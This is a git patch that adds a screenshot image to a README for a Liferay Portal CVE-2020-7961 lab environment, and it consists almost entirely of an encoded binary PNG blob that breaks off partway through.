From d384bd0a4f131c222511d15cff7bafaafacb9929 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 24 Apr 2020 03:31:11 +0800 Subject: [PATCH] complete README manual --- liferay-portal/CVE-2020-7961/3.png | Bin 0 -> 20368 bytes liferay-portal/CVE-2020-7961/README.md | 12 +++++++++--- 2 files changed, 9 insertions(+), 3 deletions(-) create mode 100644 liferay-portal/CVE-2020-7961/3.png diff --git a/liferay-portal/CVE-2020-7961/3.png b/liferay-portal/CVE-2020-7961/3.png new file mode 100644 index 0000000000000000000000000000000000000000..6f65bfada6869a351812f21822aae36cbea250a0 GIT binary patch literal 20368 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 